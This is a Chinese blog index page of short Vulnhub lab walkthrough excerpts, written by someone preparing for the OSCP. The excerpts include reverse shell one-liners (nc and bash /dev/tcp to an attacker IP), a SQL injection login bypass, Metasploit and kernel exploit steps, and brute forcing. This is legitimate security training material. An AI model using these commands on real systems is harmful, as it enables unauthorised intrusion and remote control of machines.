- 博客(21)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 oscp学习计划二期
一期只有一点点基础知识的我看着Google和vulnhub一边刷练习一边看笔记慢慢也有了自己的知识框架但是还是感觉准备的不充分笔记之前就拿CSDN做笔记了每篇博客都很少有文字大多都是我的操作截图不是特别正规为了备战明天开始用官方的报告来写但是他是五个一组就是在一个文件中要对五个靶机进行描述希望我可以一天打五个靶机吧(现在一天最多3)报告模板已经给了链接有需要的...
2020-04-29 20:31:22
1275
1
原创 Vulnhub靶机 Toppo
找了半天没发现别的东西就一个密码看了walkthrough用户名就是ted两种方法内核我没看可不可以贴个网址非常好用传送门
2020-04-29 19:13:34
378
原创 Vulnhub靶机 Prime_Series_Level-1
换一个参数 secrettier360返回结果太多过滤一下???觉得自己被耍了这不是saket的密码我吐了是victor的我*****他的连接成功以为突破口是env最后还是内核提权我用的最后一个漏洞先在kali上编译 gcc -o poc 45010.c然后传到靶机上直接运行Vulnhub就打到这吧主要是还要下载太麻烦了...
2020-04-29 16:35:58
871
原创 Vulnhub靶机 bob
一个用户名bob一个提示:运行了webshell尝试id有回显抓包看一下/bin/nc 192.168.0.128 443 -e /bin/sh 给了个账号ssh登录爆破文件给了bob的账号
2020-04-28 20:21:12
274
原创 Vulnhub靶机 Lampiao
找到登录页面cms:drupal7可以爆破用户名先找一下漏洞试试伐克尝试了半天发现版本是7.54用了半天7.0-7.31的找到mysql的账号三个账号没能解密任何一个试一下ssh失败了root就在你眼前就是没法提权的感觉太酸爽了有一个用户tiagossh爆破我*********他密码是这个??????我*********$...
2020-04-28 12:25:34
553
原创 Vulnhub靶机 GoldenEye
80端口账号:Boris密码:InvincibleHack3r暗示我利用pop3将提到过的名字作为字典hydra爆破两个账户密码pop命令给了一个账号让配置/etc/hosts提到了一个名字doakhydra爆破有一个账号让我们登录刚才的网站一个文件地址还有adm1n cr3ds clear txt没处理直接打开...
2020-04-27 23:48:33
375
原创 Vulnhub靶机 scream
打开scream.exe选择winxp_pro_with_sp2.iso下载链接:ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/等待加载然后点击3的那个按钮生成一个.iso文件这个.iso文件就是靶机了然后去VM里新建虚拟机就可以了直接试试ssh搜索漏...
2020-04-27 15:26:29
989
1
原创 Vulnhub靶机 SickOs1.2
没啥有用的东西只有一个test可以用put方式试了好几个端口4444 1180 1234都不行换了443可以了成功提权就用了一种方法这有个大佬,写的超级详细 传送门...
2020-04-25 15:14:38
230
原创 Vulnhub靶机 pwnos v2.0
先看一下80ports=$(nmap -p- --min-rate=1000 -sT -T4 10.10.10.100 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -sC -sV -p$ports -sT 10.10.10.100爆破网站目录找漏洞发现以上内容找漏洞运行脚本创...
2020-04-25 14:04:33
547
原创 Vulnhub靶机 it is october
靶机IP 192.168.0.150配置:NET之前一直配置不上IP的这有教程ports=$(nmap -p- --min-rate=1000 -sT -T4 192.168.0.107 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -sC -sV -p$ports -sT 192.168.0.107...
2020-04-24 16:12:17
765
原创 Vulnhub靶机 Fristileaks
按照作者提示要求设置虚拟机的MAC地址 08:00:27:A5:A6:76啥也没发现源码里有两个字符串解码第一个第二个给了用户名,猜测这是密码登录一下upload file又是文件上传wevely连接shell/home/eezeepz里的notes.txt文件有提示进入/home/adminfristigod的密码登录一下...
2020-04-16 19:18:41
257
原创 Vulnhub靶机 IMF
ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==flag2{aW1mYWRtaW5pc3RyYXRvcg==}imfadministratorroot直接找到了flag2进入contact界面拿到flag1解码 all the files rootflag2得到的字符串去点root访问一下得到登录页面可以猜解用户名...
2020-04-16 07:51:57
970
1
原创 Vulnhub靶机 PWNlab_init
找到靶机ip扫描到端口发现/config.phpLFI 学习链接https://blog.csdn.net/qq_29419013/article/details/81202358解码得到了一个数据库账号登录进去,看见三组账号(登录时加-D,不然不能登录)kent | Sld6WHVCSkpOeQ== JWzXuBJJNymike | U0lmZHNURW42S...
2020-04-15 16:24:41
1291
原创 Vulnhub靶机 MrRobot
arp-scan -lnmap -sV 192.168.0.143主页是这个样子的扫一下网站目录dirb http://192.168.0.143发现一个文件拿到了第一个key发现后台地址访问了一下那个文件拿到一个字典拿到的字典文件太大去重复化重新生成一个字典sort filename | uniq > filename登录后台主页找到...
2020-04-14 19:44:27
279
原创 Vulnhub靶机 Vuluix
发现25端口nmap -sP 192.168.0.0/24nmap -sV -A -O 192.168.0.136对smtp进行枚举apt-get install smtp-user-enumsmtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192....
2020-04-14 16:23:08
258
原创 Vulnhub靶机 kioptrix level 3
简介里说了先要配置hosts找靶机扫端口80 22登录界面LotusCMS搜漏洞searchsploit Lotus直接msf设置RHOSTS、URIsearch lotususe exploit/multi/http/lcms_php_execshow optionsset RHOSTS 192.168.0.128set URI /run...
2020-04-09 09:41:08
518
原创 Vulnhub靶机 Kioptrix: Level 2
找靶机,扫端口没有验证机制看的我都想暴力破解了万能密码试一下可以绕过admin‘ or ’1‘=’1抓包,这个样子命令执行192.168.0.128;bash -i >& /dev/tcp/192.168.0.128/4444 0>&1&nmap -lnvp 4444linux内核2.6.9...
2020-04-08 12:51:14
296
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人